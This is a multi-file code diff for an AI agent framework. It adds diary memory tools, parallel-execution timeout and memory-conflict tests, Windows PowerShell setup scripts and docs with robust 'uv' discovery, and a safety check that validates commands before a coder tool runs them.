label = d.strftime("%B %-d, %Y")
if d == today:
label = f"Today — {label}"
entry = f"## {label}\n\n{content}"
if total_chars + len(entry) > char_budget:
remaining = char_budget - total_chars
if remaining > 200:
# Fit a partial entry within budget
trimmed = content[: remaining - 100] + "\n\n…(truncated)"
results.append(f"## {label}\n\n{trimmed}")
else:
results.append(f"## {label}\n\n(truncated — hit size limit)")
break
results.append(entry)
total_chars += len(entry)
if not results:
if query:
return f"No diary entries matching '{query}' in the last {days_back} days."
return f"No diary entries found in the last {days_back} days."
return "\n\n---\n\n".join(results)
def register_queen_memory_tools(registry: ToolRegistry) -> None:
"""Register the episodic memory tool into the queen's tool registry."""
"""Register the episodic memory tools into the queen's tool registry."""
registry.register_function(write_to_diary)
registry.register_function(recall_diary)
core/frontend/src/pages/workspace.tsx
+7 -1
View File
@@ -1584,6 +1584,13 @@ export default function Workspace() {
const chatMsg = sseEventToChatMessage(event, agentType, displayName, currentTurn);
if (isQueen) console.log('[QUEEN] chatMsg:', chatMsg?.id, chatMsg?.content?.slice(0, 50), 'turn:', currentTurn);
if (chatMsg && !suppressQueenMessages) {
// Queen may emit multiple client_output_delta / llm_text_delta snapshots
// for a single execution as it iterates internally. Use a stable ID so
// those snapshots collapse into a single bubble instead of rendering as
// multiple independent replies to the same user message.
if (isQueen && (event.type === "client_output_delta" || event.type === "llm_text_delta") && event.execution_id) {
chatMsg.id = `queen-stream-${event.execution_id}`;
}
if (isQueen) {
chatMsg.role = role;
chatMsg.phase = queenPhaseRef.current[agentType] as ChatMessage["phase"];
@@ -2770,7 +2777,6 @@ export default function Workspace() {
const activeWorkerLabel = activeAgentState?.displayName || formatAgentDisplayName(baseAgentType(activeWorker));
return (
<div className="flex flex-col h-screen bg-background overflow-hidden">
<TopBar
core/pyproject.toml
+1
View File
@@ -11,6 +11,7 @@ dependencies = [
"litellm>=1.81.0",
"mcp>=1.0.0",
"fastmcp>=2.0.0",
"croniter>=1.4.0",
"tools",
]
core/tests/test_fanout.py
+197
View File
@@ -12,6 +12,7 @@ Covers:
- Single-edge paths unaffected
"""
import asyncio
from unittest.mock import MagicMock
import pytest
@@ -77,6 +78,19 @@ class TimingNode(NodeProtocol):
)
class SlowNode(NodeProtocol):
"""Sleeps before returning -- used for timeout testing."""
def __init__(self, delay: float = 10.0):
self.delay = delay
self.executed = False
async def execute(self, ctx: NodeContext) -> NodeResult:
await asyncio.sleep(self.delay)
self.executed = True
return NodeResult(success=True, output={"result": "slow"}, tokens_used=1, latency_ms=1)
# --- Fixtures ---
@@ -492,3 +506,186 @@ async def test_parallel_disabled_uses_sequential(runtime, goal):
# Only one branch should have executed (sequential follows first edge)
executed_count = sum([b1_impl.executed, b2_impl.executed])
assert executed_count == 1
# === 12. Branch timeout cancels slow branch ===
@pytest.mark.asyncio
async def test_branch_timeout_cancels_slow_branch(runtime, goal):
"""A branch exceeding branch_timeout_seconds should be cancelled."""
b1 = NodeSpec(
id="b1", name="B1", description="slow", node_type="event_loop", output_keys=["b1_out"]
)
b2 = NodeSpec(
id="b2", name="B2", description="fast", node_type="event_loop", output_keys=["b2_out"]
)
graph = _make_fanout_graph([b1, b2])
config = ParallelExecutionConfig(branch_timeout_seconds=0.1, on_branch_failure="fail_all")
executor = GraphExecutor(
runtime=runtime, enable_parallel_execution=True, parallel_config=config
)
executor.register_node("source", SuccessNode({"data": "x"}))
executor.register_node("b1", SlowNode(delay=10.0))
executor.register_node("b2", SuccessNode({"b2_out": "ok"}))
result = await executor.execute(graph, goal, {})
# fail_all: one branch timed out → execution fails
assert not result.success
assert "failed" in result.error.lower()
# === 13. Branch timeout with continue_others ===
@pytest.mark.asyncio
async def test_branch_timeout_with_continue_others(runtime, goal):
"""continue_others should let fast branches finish even when one times out."""
b1 = NodeSpec(
id="b1", name="B1", description="slow", node_type="event_loop", output_keys=["b1_out"]
)
b2 = NodeSpec(
id="b2", name="B2", description="fast", node_type="event_loop", output_keys=["b2_out"]
)
graph = _make_fanout_graph([b1, b2])
config = ParallelExecutionConfig(
branch_timeout_seconds=0.1, on_branch_failure="continue_others"
)
executor = GraphExecutor(
runtime=runtime, enable_parallel_execution=True, parallel_config=config
)
executor.register_node("source", SuccessNode({"data": "x"}))
executor.register_node("b1", SlowNode(delay=10.0))
b2_impl = SuccessNode({"b2_out": "ok"})
executor.register_node("b2", b2_impl)
await executor.execute(graph, goal, {})
# continue_others tolerates the timeout
assert b2_impl.executed
# === 14. Branch timeout with fail_all (explicit) ===
@pytest.mark.asyncio
async def test_branch_timeout_with_fail_all(runtime, goal):
"""fail_all should propagate timeout as execution failure."""
b1 = NodeSpec(
id="b1", name="B1", description="slow", node_type="event_loop", output_keys=["b1_out"]
)
b2 = NodeSpec(
id="b2", name="B2", description="also slow", node_type="event_loop", output_keys=["b2_out"]
)
graph = _make_fanout_graph([b1, b2])
config = ParallelExecutionConfig(branch_timeout_seconds=0.1, on_branch_failure="fail_all")
executor = GraphExecutor(
runtime=runtime, enable_parallel_execution=True, parallel_config=config
)
executor.register_node("source", SuccessNode({"data": "x"}))
executor.register_node("b1", SlowNode(delay=10.0))
executor.register_node("b2", SlowNode(delay=10.0))
result = await executor.execute(graph, goal, {})
assert not result.success
# === 15. Memory conflict: last_wins ===
@pytest.mark.asyncio
async def test_memory_conflict_last_wins(runtime, goal):
"""last_wins should allow both branches to write the same key without error."""
# Use distinct output_keys in spec (to pass graph validation) but have
# the node impl write a shared key at runtime — this is the scenario
# memory_conflict_strategy is designed to handle.
b1 = NodeSpec(
id="b1", name="B1", description="b1", node_type="event_loop", output_keys=["b1_out"]
)
b2 = NodeSpec(
id="b2", name="B2", description="b2", node_type="event_loop", output_keys=["b2_out"]
)
graph = _make_fanout_graph([b1, b2])
config = ParallelExecutionConfig(memory_conflict_strategy="last_wins")
executor = GraphExecutor(
runtime=runtime, enable_parallel_execution=True, parallel_config=config
)
executor.register_node("source", SuccessNode({"data": "x"}))
# Both impls write "shared_key" — triggers conflict detection at runtime
executor.register_node("b1", SuccessNode({"shared_key": "from_b1", "b1_out": "ok"}))
executor.register_node("b2", SuccessNode({"shared_key": "from_b2", "b2_out": "ok"}))
result = await executor.execute(graph, goal, {})
assert result.success
# The key should exist with one of the two values
assert result.output.get("shared_key") in ("from_b1", "from_b2")
# === 16. Memory conflict: first_wins ===
@pytest.mark.asyncio
async def test_memory_conflict_first_wins(runtime, goal):
"""first_wins should keep the first branch's value and skip later writes."""
b1 = NodeSpec(
id="b1", name="B1", description="b1", node_type="event_loop", output_keys=["b1_out"]
)
b2 = NodeSpec(
id="b2", name="B2", description="b2", node_type="event_loop", output_keys=["b2_out"]
)
graph = _make_fanout_graph([b1, b2])
config = ParallelExecutionConfig(memory_conflict_strategy="first_wins")
executor = GraphExecutor(
runtime=runtime, enable_parallel_execution=True, parallel_config=config
)
executor.register_node("source", SuccessNode({"data": "x"}))
executor.register_node("b1", SuccessNode({"shared_key": "from_b1", "b1_out": "ok"}))
executor.register_node("b2", SuccessNode({"shared_key": "from_b2", "b2_out": "ok"}))
result = await executor.execute(graph, goal, {})
assert result.success
# === 17. Memory conflict: error raises ===
@pytest.mark.asyncio
async def test_memory_conflict_error_raises(runtime, goal):
"""error strategy should fail when two branches write the same key."""
b1 = NodeSpec(
id="b1", name="B1", description="b1", node_type="event_loop", output_keys=["b1_out"]
)
b2 = NodeSpec(
id="b2", name="B2", description="b2", node_type="event_loop", output_keys=["b2_out"]
)
graph = _make_fanout_graph([b1, b2])
config = ParallelExecutionConfig(memory_conflict_strategy="error")
executor = GraphExecutor(
runtime=runtime, enable_parallel_execution=True, parallel_config=config
)
executor.register_node("source", SuccessNode({"data": "x"}))
executor.register_node("b1", SuccessNode({"shared_key": "from_b1", "b1_out": "ok"}))
executor.register_node("b2", SuccessNode({"shared_key": "from_b2", "b2_out": "ok"}))
result = await executor.execute(graph, goal, {})
assert not result.success
# The conflict RuntimeError is caught inside execute_single_branch,
# which causes the branch to fail. fail_all then raises its own error.
assert "failed" in result.error.lower()
core/tests/test_graph_executor.py
+70
View File
@@ -3,12 +3,16 @@ Tests for core GraphExecutor execution paths.
Focused on minimal success and failure scenarios.
"""
import json
import logging
import pytest
from framework.graph.edge import GraphSpec
from framework.graph.executor import GraphExecutor
from framework.graph.goal import Goal
from framework.graph.node import NodeResult, NodeSpec
from framework.utils.io import atomic_write
# ---- Dummy runtime (no real logging) ----
@@ -25,6 +29,14 @@ class DummyRuntime:
pass
class DummyMemory:
def __init__(self, data):
self._data = data
def read_all(self):
return self._data
# ---- Fake node that always succeeds ----
class SuccessNode:
def validate_input(self, ctx):
@@ -245,3 +257,61 @@ async def test_executor_no_events_without_event_bus():
result = await executor.execute(graph=graph, goal=goal)
assert result.success is True
def test_write_progress_uses_atomic_write_and_updates_state(tmp_path, monkeypatch):
runtime = DummyRuntime()
executor = GraphExecutor(runtime=runtime, storage_path=tmp_path)
state_path = tmp_path / "state.json"
state_path.write_text(json.dumps({"entry_point": "primary"}), encoding="utf-8")
memory = DummyMemory({"foo": "bar"})
called = {}
def recording_atomic_write(path, *args, **kwargs):
called["path"] = path
return atomic_write(path, *args, **kwargs)
monkeypatch.setattr("framework.graph.executor.atomic_write", recording_atomic_write)
executor._write_progress(
current_node="node-b",
path=["node-a", "node-b"],
memory=memory,
node_visit_counts={"node-a": 1, "node-b": 1},
)
state = json.loads(state_path.read_text(encoding="utf-8"))
assert called["path"] == state_path
assert state["entry_point"] == "primary"
assert state["progress"]["current_node"] == "node-b"
assert state["progress"]["path"] == ["node-a", "node-b"]
assert state["progress"]["node_visit_counts"] == {"node-a": 1, "node-b": 1}
assert state["progress"]["steps_executed"] == 2
assert state["memory"] == {"foo": "bar"}
assert state["memory_keys"] == ["foo"]
assert "updated_at" in state["timestamps"]
def test_write_progress_logs_warning_on_atomic_write_failure(tmp_path, monkeypatch, caplog):
runtime = DummyRuntime()
executor = GraphExecutor(runtime=runtime, storage_path=tmp_path)
state_path = tmp_path / "state.json"
state_path.write_text(json.dumps({"entry_point": "primary"}), encoding="utf-8")
memory = DummyMemory({"foo": "bar"})
def failing_atomic_write(*args, **kwargs):
raise OSError("disk full")
monkeypatch.setattr("framework.graph.executor.atomic_write", failing_atomic_write)
with caplog.at_level(logging.WARNING):
executor._write_progress(
current_node="node-b",
path=["node-a", "node-b"],
memory=memory,
node_visit_counts={"node-a": 1, "node-b": 1},
)
assert "Failed to persist progress state to" in caplog.text
assert str(state_path) in caplog.text
core/tests/test_llm_judge.py
+63
View File
@@ -338,6 +338,69 @@ class TestLLMJudgeBackwardCompatibility:
assert call_kwargs["model"] == "claude-haiku-4-5-20251001"
assert call_kwargs["max_tokens"] == 500
def test_openai_fallback_uses_litellm_provider(self, monkeypatch):
"""When OPENAI_API_KEY is set, evaluate() should use a LiteLLM-based provider."""
# Force the OpenAI fallback path (no injected provider, no Anthropic key)
monkeypatch.setenv("OPENAI_API_KEY", "sk-test-openai")
monkeypatch.delenv("ANTHROPIC_API_KEY", raising=False)
# Stub LiteLLMProvider so we don't call the real API; record what judge passes through
captured_calls: list[dict] = []
class DummyProvider:
def __init__(self, model: str = "gpt-4o-mini"):
self.model = model
def complete(
self,
messages,
system="",
tools=None,
max_tokens=1024,
response_format=None,
json_mode=False,
max_retries=None,
):
captured_calls.append(
{
"messages": messages,
"system": system,
"max_tokens": max_tokens,
"json_mode": json_mode,
"model": self.model,
}
)
class _Resp:
def __init__(self, content: str):
self.content = content
# Minimal response object with a content attribute
return _Resp('{"passes": true, "explanation": "OK"}')
monkeypatch.setattr(
"framework.llm.litellm.LiteLLMProvider",
DummyProvider,
)
judge = LLMJudge()
result = judge.evaluate(
constraint="no-hallucination",
source_document="The sky is blue.",
summary="The sky is blue.",
criteria="Summary must only contain facts from source",
)
# Judge should have used our stub once and returned the stub's JSON result
assert result["passes"] is True
assert result["explanation"] == "OK"
assert len(captured_calls) == 1
call = captured_calls[0]
assert call["model"] == "gpt-4o-mini"
assert call["max_tokens"] == 500
assert call["json_mode"] is True
# ============================================================================
# LLMJudge Integration Pattern Tests
docs/environment-setup.md
+12 -7
View File
@@ -10,8 +10,7 @@ Complete setup guide for building and running goal-driven agents with the Aden A
```
> **Note for Windows Users:**
> Running the setup script on native Windows shells (PowerShell / Git Bash) may sometimes fail due to Python App Execution Aliases.
> It is **strongly recommended to use WSL (Windows Subsystem for Linux)** for a smoother setup experience.
> Native Windows is supported via `quickstart.ps1`. Run it in PowerShell 5.1+. Disable "App Execution Aliases" in Windows settings to avoid Python path conflicts.
This will:
@@ -25,13 +24,19 @@ This will:
## Windows Setup
Windows users should use **WSL (Windows Subsystem for Linux)** to set up and run agents.
Native Windows is supported. Run the PowerShell quickstart:
1. [Install WSL 2](https://learn.microsoft.com/en-us/windows/wsl/install) if you haven't already:
```powershell
.\quickstart.ps1
```
Alternatively, you can use WSL:
1. [Install WSL 2](https://learn.microsoft.com/en-us/windows/wsl/install):
```powershell
wsl --install
```
2. Open your WSL terminal, clone the repo, and run the quickstart script:
2. Open your WSL terminal, clone the repo, and run:
```bash
./quickstart.sh
```
@@ -93,7 +98,7 @@ uv run python -c "import litellm; print('✓ litellm OK')"
```
> **Windows Tip:**
> On Windows, if the verification commands fail, ensure you are running them in **WSL** or after **disabling Python App Execution Aliases** in Windows Settings → Apps → App Execution Aliases.
> If the verification commands fail on Windows, disable "App Execution Aliases" in Windows Settings → Apps → App Execution Aliases.
## Requirements
@@ -108,7 +113,7 @@ uv run python -c "import litellm; print('✓ litellm OK')"
- pip (latest version)
- 2GB+ RAM
- Internet connection (for LLM API calls)
- For Windows users: WSL 2 is recommended for full compatibility.
- For Windows users: PowerShell 5.1+ (native) or WSL 2.
### API Keys
docs/getting-started.md
+18
View File
@@ -13,6 +13,8 @@ This guide will help you set up the Aden Agent Framework and build your first ag
The fastest way to get started:
**Linux / macOS:**
```bash
# 1. Clone the repository
git clone https://github.com/adenhq/hive.git
@@ -25,6 +27,22 @@ cd hive
uv run python -c "import framework; import aden_tools; print('✓ Setup complete')"
```
**Windows (PowerShell):**
```powershell
# 1. Clone the repository
git clone https://github.com/adenhq/hive.git
cd hive
# 2. Run automated setup
.\quickstart.ps1
# 3. Verify installation (optional, quickstart.ps1 already verifies)
uv run python -c "import framework; import aden_tools; print('Setup complete')"
```
> **Note:** On Windows, running `.\quickstart.ps1` requires PowerShell 5.1+. If you see a "running scripts is disabled" error, run `Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass` first. Alternatively, use WSL — see [environment-setup.md](./environment-setup.md) for details.
## Building Your First Agent
Agents are not included by default in a fresh clone.
hive.ps1
+9 -10
View File
@@ -10,6 +10,9 @@
$ErrorActionPreference = "Stop"
$ScriptDir = Split-Path -Parent $MyInvocation.MyCommand.Definition
$UvHelperPath = Join-Path $ScriptDir "scripts\uv-discovery.ps1"
. $UvHelperPath
# ── Validate project directory ──────────────────────────────────────
@@ -30,16 +33,12 @@ if (-not (Test-Path (Join-Path $ScriptDir ".venv"))) {
# ── Ensure uv is available ──────────────────────────────────────────
if (-not (Get-Command uv -ErrorAction SilentlyContinue)) {
# Check default install location before giving up
$uvExe = Join-Path $env:USERPROFILE ".local\bin\uv.exe"
if (Test-Path $uvExe) {
$env:Path = (Split-Path $uvExe) + ";" + $env:Path
} else {
Write-Error "uv is not installed. Run .\quickstart.ps1 first."
exit 1
}
$uvInfo = Get-WorkingUvInfo
if (-not $uvInfo) {
Write-Error "uv is not installed or is not runnable. Run .\quickstart.ps1 first."
exit 1
}
$uvExe = $uvInfo.Path
# ── Load environment variables from Windows Registry ────────────────
# Windows stores User-level env vars in the registry. New terminal
@@ -80,4 +79,4 @@ if (-not $env:HIVE_CREDENTIAL_KEY) {
# ── Run the Hive CLI ────────────────────────────────────────────────
# PYTHONUTF8=1: use UTF-8 for default encoding (fixes charmap decode errors on Windows)
$env:PYTHONUTF8 = "1"
& uv run hive @args
& $uvExe run hive @args
quickstart.ps1
+33 -41
View File
@@ -18,6 +18,10 @@
# Use "Continue" so stderr from external tools (uv, python) does not
# terminate the script. Errors are handled via $LASTEXITCODE checks.
$ErrorActionPreference = "Continue"
$ScriptDir = Split-Path -Parent $MyInvocation.MyCommand.Definition
$UvHelperPath = Join-Path $ScriptDir "scripts\uv-discovery.ps1"
. $UvHelperPath
# ============================================================
# Colors / helpers
@@ -95,7 +99,6 @@ function Prompt-Choice {
}
}
# ============================================================
# Windows Defender Exclusion Functions
# ============================================================
@@ -276,9 +279,6 @@ function Add-DefenderExclusions {
}
}
# Get the directory where this script lives
$ScriptDir = Split-Path -Parent $MyInvocation.MyCommand.Definition
# ============================================================
# Banner
# ============================================================
@@ -352,10 +352,10 @@ Write-Host ""
# Check / install uv
# ============================================================
$uvCmd = Get-Command uv -ErrorAction SilentlyContinue
$uvInfo = Get-WorkingUvInfo
# If uv not in PATH, check if it exists in default location
if (-not $uvCmd) {
if (-not $uvInfo) {
$uvDir = Join-Path $env:USERPROFILE ".local\bin"
$uvExePath = Join-Path $uvDir "uv.exe"
@@ -371,16 +371,16 @@ if (-not $uvCmd) {
# Refresh PATH for current session
$env:Path = [System.Environment]::GetEnvironmentVariable("Path", "User") + ";" + [System.Environment]::GetEnvironmentVariable("Path", "Machine")
$uvCmd = Get-Command uv -ErrorAction SilentlyContinue
$uvInfo = Get-WorkingUvInfo
if ($uvCmd) {
if ($uvInfo) {
Write-Ok "uv is now in PATH"
}
}
}
# If still not found, install it
if (-not $uvCmd) {
if (-not $uvInfo) {
Write-Warn "uv not found. Installing..."
try {
# Official uv installer for Windows
@@ -397,13 +397,13 @@ if (-not $uvCmd) {
# Refresh PATH for current session
$env:Path = [System.Environment]::GetEnvironmentVariable("Path", "User") + ";" + [System.Environment]::GetEnvironmentVariable("Path", "Machine")
$uvCmd = Get-Command uv -ErrorAction SilentlyContinue
$uvInfo = Get-WorkingUvInfo
} catch {
Write-Color -Text "Error: uv installation failed" -Color Red
Write-Host "Please install uv manually from https://astral.sh/uv/"
exit 1
}
if (-not $uvCmd) {
if (-not $uvInfo) {
Write-Color -Text "Error: uv not found after installation" -Color Red
Write-Host "Please close and reopen PowerShell, then run this script again."
Write-Host "Or install uv manually from https://astral.sh/uv/"
@@ -412,8 +412,8 @@ if (-not $uvCmd) {
Write-Ok "uv installed successfully"
}
$uvVersion = & uv --version
Write-Ok "uv detected: $uvVersion"
$UvCmd = $uvInfo.Path
Write-Ok "uv detected: $($uvInfo.Version)"
Write-Host ""
# Check for Node.js (needed for frontend dashboard)
@@ -503,7 +503,7 @@ try {
if (Test-Path "pyproject.toml") {
Write-Host " Installing workspace packages... " -NoNewline
$syncOutput = & uv sync 2>&1
$syncOutput = & $UvCmd sync 2>&1
$syncExitCode = $LASTEXITCODE
if ($syncExitCode -eq 0) {
@@ -518,9 +518,9 @@ try {
exit 1
}
# Check for Chrome/Edge (required for GCU browser tools)
# Keep browser setup scoped to detecting the system browser used by GCU.
Write-Host " Checking for Chrome/Edge browser... " -NoNewline
$null = & uv run python -c "from gcu.browser.chrome_finder import find_chrome; assert find_chrome()" 2>&1
$null = & $UvCmd run python -c "from gcu.browser.chrome_finder import find_chrome; assert find_chrome()" 2>&1
$chromeCheckExit = $LASTEXITCODE
if ($chromeCheckExit -eq 0) {
Write-Ok "ok"
@@ -720,7 +720,7 @@ $imports = @(
$modulesToCheck = @("framework", "aden_tools", "litellm")
try {
$checkOutput = & uv run python scripts/check_requirements.py @modulesToCheck 2>&1 | Out-String
$checkOutput = & $UvCmd run python scripts/check_requirements.py @modulesToCheck 2>&1 | Out-String
$resultJson = $null
# Try to parse JSON result
@@ -764,14 +764,6 @@ if ($importErrors -gt 0) {
}
Write-Host ""
# ============================================================
# Step 4: Verify Claude Code Skills
# ============================================================
Write-Step -Number "4" -Text "Step 4: Verifying Claude Code skills..."
# (skills check is informational only, shown in final verification)
# ============================================================
# Provider / model data
# ============================================================
@@ -1091,7 +1083,7 @@ switch ($num) {
Write-Warn "Codex credentials not found. Starting OAuth login..."
Write-Host ""
try {
& uv run python (Join-Path $ScriptDir "core\codex_oauth.py") 2>&1
& $UvCmd run python (Join-Path $ScriptDir "core\codex_oauth.py") 2>&1
if ($LASTEXITCODE -eq 0) {
$CodexCredDetected = $true
} else {
@@ -1164,7 +1156,7 @@ switch ($num) {
# Health check the new key
Write-Host " Verifying API key... " -NoNewline
try {
$hcResult = & uv run python (Join-Path $ScriptDir "scripts/check_llm_key.py") $SelectedProviderId $apiKey 2>$null
$hcResult = & $UvCmd run python (Join-Path $ScriptDir "scripts/check_llm_key.py") $SelectedProviderId $apiKey 2>$null
$hcJson = $hcResult | ConvertFrom-Json
if ($hcJson.valid -eq $true) {
Write-Color -Text "ok" -Color Green
@@ -1239,7 +1231,7 @@ if ($SubscriptionMode -eq "zai_code") {
# Health check the new key
Write-Host " Verifying ZAI API key... " -NoNewline
try {
$hcResult = & uv run python (Join-Path $ScriptDir "scripts/check_llm_key.py") "zai" $apiKey "https://api.z.ai/api/coding/paas/v4" 2>$null
$hcResult = & $UvCmd run python (Join-Path $ScriptDir "scripts/check_llm_key.py") "zai" $apiKey "https://api.z.ai/api/coding/paas/v4" 2>$null
$hcJson = $hcResult | ConvertFrom-Json
if ($hcJson.valid -eq $true) {
Write-Color -Text "ok" -Color Green
@@ -1307,7 +1299,7 @@ if ($SubscriptionMode -eq "kimi_code") {
# Health check the new key
Write-Host " Verifying Kimi API key... " -NoNewline
try {
$hcResult = & uv run python (Join-Path $ScriptDir "scripts/check_llm_key.py") "kimi" $apiKey "https://api.kimi.com/coding" 2>$null
$hcResult = & $UvCmd run python (Join-Path $ScriptDir "scripts/check_llm_key.py") "kimi" $apiKey "https://api.kimi.com/coding" 2>$null
$hcJson = $hcResult | ConvertFrom-Json
if ($hcJson.valid -eq $true) {
Write-Color -Text "ok" -Color Green
@@ -1394,7 +1386,7 @@ if ($SelectedProviderId) {
Write-Host ""
# ============================================================
# Step 5b: Browser Automation (GCU) — always enabled
# Browser Automation (GCU) — always enabled
# ============================================================
Write-Host ""
@@ -1419,10 +1411,10 @@ if (Test-Path $HiveConfigFile) {
Write-Host ""
# ============================================================
# Step 6: Initialize Credential Store
# Step 4: Initialize Credential Store
# ============================================================
Write-Step -Number "5" -Text "Step 5: Initializing credential store..."
Write-Step -Number "4" -Text "Step 4: Initializing credential store..."
Write-Color -Text "The credential store encrypts API keys and secrets for your agents." -Color DarkGray
Write-Host ""
@@ -1459,7 +1451,7 @@ if ($credKey) {
} else {
Write-Host " Generating encryption key... " -NoNewline
try {
$generatedKey = & uv run python -c "from cryptography.fernet import Fernet; print(Fernet.generate_key().decode())" 2>$null
$generatedKey = & $UvCmd run python -c "from cryptography.fernet import Fernet; print(Fernet.generate_key().decode())" 2>$null
if ($LASTEXITCODE -eq 0 -and $generatedKey) {
Write-Ok "ok"
$generatedKey = $generatedKey.Trim()
@@ -1508,7 +1500,7 @@ if ($credKey) {
Write-Ok "Credential store initialized at ~/.hive/credentials/"
Write-Host " Verifying credential store... " -NoNewline
$verifyOut = & uv run python -c "from framework.credentials.storage import EncryptedFileStorage; storage = EncryptedFileStorage(); print('ok')" 2>$null
$verifyOut = & $UvCmd run python -c "from framework.credentials.storage import EncryptedFileStorage; storage = EncryptedFileStorage(); print('ok')" 2>$null
if ($verifyOut -match "ok") {
Write-Ok "ok"
} else {
@@ -1518,10 +1510,10 @@ if ($credKey) {
Write-Host ""
# ============================================================
# Step 6: Verify Setup
# Step 5: Verify Setup
# ============================================================
Write-Step -Number "6" -Text "Step 6: Verifying installation..."
Write-Step -Number "5" -Text "Step 5: Verifying installation..."
$verifyErrors = 0
@@ -1529,7 +1521,7 @@ $verifyErrors = 0
$verifyModules = @("framework", "aden_tools")
try {
$verifyOutput = & uv run python scripts/check_requirements.py @verifyModules 2>&1 | Out-String
$verifyOutput = & $UvCmd run python scripts/check_requirements.py @verifyModules 2>&1 | Out-String
$verifyJson = $null
try {
@@ -1539,7 +1531,7 @@ try {
# Fall back to basic checks if JSON parsing fails
foreach ($mod in $verifyModules) {
Write-Host " $([char]0x2B21) $mod... " -NoNewline
$null = & uv run python -c "import $mod" 2>&1
$null = & $UvCmd run python -c "import $mod" 2>&1
if ($LASTEXITCODE -eq 0) { Write-Ok "ok" }
else { Write-Fail "failed"; $verifyErrors++ }
}
@@ -1559,7 +1551,7 @@ try {
}
Write-Host " $([char]0x2B21) litellm... " -NoNewline
$null = & uv run python -c "import litellm" 2>&1
$null = & $UvCmd run python -c "import litellm" 2>&1
if ($LASTEXITCODE -eq 0) { Write-Ok "ok" } else { Write-Warn "skipped" }
Write-Host " $([char]0x2B21) MCP config... " -NoNewline
@@ -1625,10 +1617,10 @@ if ($verifyErrors -gt 0) {
}
# ============================================================
# Step 7: Install hive CLI wrapper
# Step 6: Install hive CLI wrapper
# ============================================================
Write-Step -Number "7" -Text "Step 7: Installing hive CLI..."
Write-Step -Number "6" -Text "Step 6: Installing hive CLI..."
# Verify hive.ps1 wrapper exists in project root
$hivePs1Path = Join-Path $ScriptDir "hive.ps1"
quickstart.sh
+8 -22
View File
@@ -300,18 +300,11 @@ if [ "$NODE_AVAILABLE" = true ]; then
echo ""
fi
# ============================================================
# Step 3: Configure LLM API Key
# ============================================================
echo -e "${YELLOW}${NC} ${BLUE}${BOLD}Step 3: Configuring LLM provider...${NC}"
echo ""
# ============================================================
# Step 3: Verify Python Imports
# ============================================================
echo -e "${BLUE}Step 3: Verifying Python imports...${NC}"
echo -e "${YELLOW}${NC} ${BLUE}${BOLD}Step 3: Verifying Python imports...${NC}"
echo ""
IMPORT_ERRORS=0
@@ -367,13 +360,6 @@ fi
echo ""
# ============================================================
# Step 4: Verify Claude Code Skills
# ============================================================
echo -e "${BLUE}Step 4: Verifying Claude Code skills...${NC}"
echo ""
# Provider configuration - use associative arrays (Bash 4+) or indexed arrays (Bash 3.2)
if [ "$USE_ASSOC_ARRAYS" = true ]; then
# Bash 4+ - use associative arrays (cleaner and more efficient)
@@ -1334,7 +1320,7 @@ fi
echo ""
# ============================================================
# Step 4b: Browser Automation (GCU) — always enabled
# Browser Automation (GCU) — always enabled
# ============================================================
echo -e "${GREEN}${NC} Browser automation enabled"
@@ -1362,10 +1348,10 @@ fi
echo ""
# ============================================================
# Step 5: Initialize Credential Store
# Step 4: Initialize Credential Store
# ============================================================
echo -e "${YELLOW}${NC} ${BLUE}${BOLD}Step 5: Initializing credential store...${NC}"
echo -e "${YELLOW}${NC} ${BLUE}${BOLD}Step 4: Initializing credential store...${NC}"
echo ""
echo -e "${DIM}The credential store encrypts API keys and secrets for your agents.${NC}"
echo ""
@@ -1432,10 +1418,10 @@ fi
echo ""
# ============================================================
# Step 6: Verify Setup
# Step 5: Verify Setup
# ============================================================
echo -e "${YELLOW}${NC} ${BLUE}${BOLD}Step 6: Verifying installation...${NC}"
echo -e "${YELLOW}${NC} ${BLUE}${BOLD}Step 5: Verifying installation...${NC}"
echo ""
ERRORS=0
@@ -1496,10 +1482,10 @@ if [ $ERRORS -gt 0 ]; then
fi
# ============================================================
# Step 7: Install hive CLI globally
# Step 6: Install hive CLI globally
# ============================================================
echo -e "${YELLOW}${NC} ${BLUE}${BOLD}Step 7: Installing hive CLI...${NC}"
echo -e "${YELLOW}${NC} ${BLUE}${BOLD}Step 6: Installing hive CLI...${NC}"
echo ""
# Ensure ~/.local/bin exists and is in PATH
scripts/uv-discovery.ps1
+44
View File
@@ -0,0 +1,44 @@
function Get-WorkingUvInfo {
<#
.SYNOPSIS
Find a runnable uv executable, not just a PATH entry named "uv"
.OUTPUTS
Hashtable with Path and Version, or $null if no working uv is found
#>
# pyenv-win can expose a uv shim that exists on PATH but fails at runtime.
# Verify each candidate with `uv --version` before trusting it.
$candidates = @()
$commands = @(Get-Command uv -All -ErrorAction SilentlyContinue)
foreach ($cmd in $commands) {
if ($cmd.Source) {
$candidates += $cmd.Source
} elseif ($cmd.Definition) {
$candidates += $cmd.Definition
} elseif ($cmd.Name) {
$candidates += $cmd.Name
}
}
$defaultUvExe = Join-Path $env:USERPROFILE ".local\bin\uv.exe"
if (Test-Path $defaultUvExe) {
$candidates += $defaultUvExe
}
foreach ($candidate in ($candidates | Where-Object { $_ } | Select-Object -Unique)) {
try {
$versionOutput = & $candidate --version 2>$null
$version = ($versionOutput | Out-String).Trim()
if ($LASTEXITCODE -eq 0 -and -not [string]::IsNullOrWhiteSpace($version)) {
return @{
Path = $candidate
Version = $version
}
}
} catch {
# Try the next candidate.
}
}
return $null
}
tools/coder_tools_server.py
+19
View File
@@ -25,6 +25,12 @@ from pathlib import Path
logger = logging.getLogger(__name__)
_TOOLS_SRC = Path(__file__).resolve().parent / "src"
if _TOOLS_SRC.is_dir():
tools_src = str(_TOOLS_SRC)
if tools_src not in sys.path:
sys.path.insert(0, tools_src)
def setup_logger():
if not logger.handlers:
@@ -52,6 +58,12 @@ if "--stdio" in sys.argv:
from fastmcp import FastMCP # noqa: E402
# Import command sanitizer — shared module in aden_tools
from aden_tools.tools.file_system_toolkits.command_sanitizer import ( # noqa: E402
CommandBlockedError,
validate_command,
)
mcp = FastMCP("coder-tools")
PROJECT_ROOT: str = ""
@@ -208,6 +220,8 @@ def run_command(command: str, cwd: str = "", timeout: int = 120) -> str:
PYTHONPATH is automatically set to include core/ and exports/.
Output is truncated at 30K chars with a notice.
Commands still execute with shell=True, so the sanitizer blocks
explicit nested shell executables but cannot remove shell parsing.
Args:
command: Shell command to execute
@@ -222,6 +236,11 @@ def run_command(command: str, cwd: str = "", timeout: int = 120) -> str:
try:
command = _translate_command_for_windows(command)
# Validate command against safety blocklist before execution
try:
validate_command(command)
except CommandBlockedError as e:
return f"Error: {e}"
start = time.monotonic()
result = subprocess.run(
command,
